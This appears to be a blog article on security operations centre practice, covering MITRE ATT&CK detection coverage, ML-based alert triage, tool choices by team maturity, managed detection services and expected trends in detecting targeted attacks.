MITRE ATT&CK is not an academic reference but a working tool for the SOC analyst. Each technique in the matrix is a specific detection case: which data source is needed, which pattern to look for, which tools can detect it. SOC maturity is measured not by the number of alerts but by the percentage of MITRE ATT&CK coverage.
SOC maturity matrix

Key techniques for priority coverage, based on threat reports from 2024-2025:
• T1190 - Exploit Public-Facing Application (38% of initial access per M-Trends)
• T1078 - Valid Accounts (71% growth per IBM X-Force)
• T1071 - Application Layer Protocol (C2 via HTTPS/DNS)
• T1003 - OS Credential Dumping (a prerequisite for lateral movement)
• T1055 - Process Injection (the main evasion technique)
Every vendor platform (CrowdStrike, SentinelOne, Elastic) declares a percentage of MITRE ATT&CK coverage. But declared coverage and real detection are different things. Coverage means the platform can collect telemetry for a technique. Detection means you have a tuned rule that turns that telemetry into an alert. The difference between the two is the work of your SOC engineer.
AI and ML in the SOC: from 4500 alerts to dozens of priority cases
Generative AI transforms both sides of the conflict. According to IBM X-Force, generating phishing emails with GenAI is 11.4 times faster at comparable quality. CrowdStrike records a doubling of malicious GenAI use for social engineering in 2024. Attackers automate the reconnaissance and initial access phases.
SOC teams respond with ML alert scoring: supervised learning identifies known patterns (in essence, improved signatures), unsupervised learning detects anomalies (zero-day behavior). Stellar Cyber Open XDR claims a 50-60% reduction in the false positive rate through Multi-Layer AI. The practical result: the L1 analyst does not receive 4500 "raw" alerts but 30-50 prioritized cases with context.
But AI scoring does not replace analysts. Organizational context is what ML cannot take into account. A PowerShell script at 2:00 am on an IT administrator's host is normal work. The same script on a marketer's host is a red flag. This context is known only to a person working with the specific infrastructure.
Detailed analysis of ML approaches in the SOC with real metrics: Machine Learning in Cybersecurity: How ML Scoring Reduces SOC Triage
Practical stack: what to deploy depending on SOC maturity
The choice of tools depends on budget, team size and current maturity level. There is no universal stack; there is a decision tree.
Stack by team size

When to buy MDR instead of hiring
Managed Detection and Response (MDR), outsourced detection and response, is economically justified when the cost of hiring and retaining L2-L3 analysts exceeds the cost of the MDR service. For a team of 1-3 people, an MDR provider (UnderDefense, CrowdStrike OverWatch, Arctic Wolf) covers night shifts and gives access to expertise that cannot be hired on the market.
MDR's limit: the provider does not know your infrastructure the way the internal team does. The first 30 days are the onboarding period, when the number of false escalations will be high. Be prepared for that.
Data sources for APT detection: what to collect and why
Detecting targeted attacks starts not with tools but with data sources. If SIEM does not receive the right logs, no correlation rule will help.

Key logging requirements come from OWASP A09:2021 (Security Logging and Monitoring Failures): without logging and monitoring, a compromise cannot be detected. Auditable events must be logged, alerts must be generated, and logs must be analyzed. Violating any of these conditions creates a blind spot for APT.
Where APT detection is heading in 2026-2027
Three trends will determine APT detection in the coming year.
AI-native detection will replace AI-assisted. The difference is fundamental: in AI-assisted, ML complements the existing rules; in AI-native, ML is the main detection engine and rules are used for validation. Next-generation platforms will build attack storylines automatically, correlating endpoint, network and identity telemetry through graph ML without manual rule configuration.
Detection-as-Code will become the standard. Sigma rules versioned in Git, tested through CI/CD and deployed to any SIEM: mature SOC teams already work this way. In 2026-2027 it will become a baseline requirement. The Sigma + YARA + osquery bundle gives a portable, vendor-independent detection stack.
Identity-centric security will replace perimeter-centric. With 79% of attacks involving no malware and 71% growth in credential-based attacks, the detection focus shifts from "what is running on the host" to "who is doing what, and why it is abnormal". UEBA, behavioral analysis and continuous authentication are not options but mandatory components of the SOC stack.
Most SOC teams I have watched in recent years make the same mistake: they buy tools instead of building a process. The organization puts CrowdStrike on endpoints, connects Splunk, deploys NDR, and believes it is protected from APT. Six months later it turns out that the EDR agent is on 80% of hosts (the remaining 20% are Linux servers that were "forgotten" during rollout), the SIEM rules are the defaults, and nobody understands the NDR alerts because the L1 analyst does not know what "anomalous beacon pattern" means.
Tools are multipliers. Multiply them by zero process and you get zero detection. I have seen a two-person SOC with Elastic and well-written Sigma rules catch lateral movement in 15 minutes. And I have seen a twenty-person SOC with a multi-million-dollar enterprise stack where a Cobalt Strike beacon stayed online for a month because the alert drowned in a stream of four thousand daily false positives.
In the next two years there will be a sharp polarization. Teams that invest in Detection Engineering, writing, testing and iterating detection rules as code, will catch APT in the early stages of the kill chain. Teams that continue to rely on vendor defaults and marketing promises of "AI-powered detection" will learn about their compromise from the news. The market for AI-native SOC platforms is growing, but the technology will not replace an engineer who understands why a specific PowerShell script on a particular host at a particular time is a red flag rather than standard automation. Each team makes the choice between these two paths today, not when the attacker is already inside.